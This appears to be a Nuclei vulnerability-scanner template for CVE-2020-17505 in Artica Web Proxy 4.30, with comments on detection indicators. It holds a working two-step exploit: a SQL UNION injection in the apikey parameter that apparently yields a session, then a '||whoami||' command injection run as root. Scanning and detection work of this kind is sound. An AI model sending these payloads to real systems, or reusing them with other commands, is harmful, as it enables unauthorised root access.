nuclei-templates/cves/CVE-2020-17505.yaml


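# Nuclei template: active check for CVE-2020-17505 (Artica Web Proxy 4.30).
# Nesting is restored here; with every key at column 0 the file does not
# parse as the intended template (name/author/severity belong under `info`,
# and the raw requests and matchers belong under the single `requests` entry).
id: CVE-2020-17505

info:
  name: Artica Web Proxy 4.30 OS Command Injection
  author: dwisiswant0
  severity: high

  # Artica Web Proxy 4.30.00000000 allows an authenticated remote attacker
  # to inject commands via the service-cmds parameter in cyrus.php.
  # These commands are executed with root privileges via service_cmds_peform.
  #
  # NOTE(review): the advisory text above names `service-cmds` in `cyrus.php`,
  # while the second request below targets `cyrus.index.php` with the
  # `service-cmds-peform` parameter - confirm against the reference.
  #
  # This is an active check: on a vulnerable host the second request causes
  # `whoami` to be executed, and the matchers look for its output.
  #
  # Log indicators visible in this template (useful for detection rules):
  #   - GET /fw.login.php with `UNION select` in the `apikey` query parameter
  #   - GET /cyrus.index.php with `||` (URL-encoded %7C%7C) in
  #     `service-cmds-peform`
  #
  # References:
  # > https://blog.max0x4141.com/post/artica_proxy/

requests:
  - raw:
      # Request 1: the `apikey` parameter of the login page carries a SQL
      # UNION select with a base64 value. Presumably this is what yields the
      # session that `cookie-reuse` carries into request 2 - TODO confirm
      # against the reference.
      - |
        GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept: */*
        Connection: close
      # Request 2: the command-injection probe itself (`||whoami||`).
      - |
        GET /cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept: */*
        Connection: close

    # Cookies set by the first response are sent with the second request.
    cookie-reuse: true

    # Both matchers below must succeed for the template to report a finding.
    matchers-condition: and
    matchers:
      # All three words must appear in the same response body.
      # "root" alone is a loose indicator (it can occur in unrelated page
      # text); the match depends on the two more specific strings alongside
      # it to keep false positives down.
      - type: word
        words:
          - "array(2)"
          - "Position: ||whoami||"
          - "root"
        condition: and
        part: body

      - type: status
        status:
          - 200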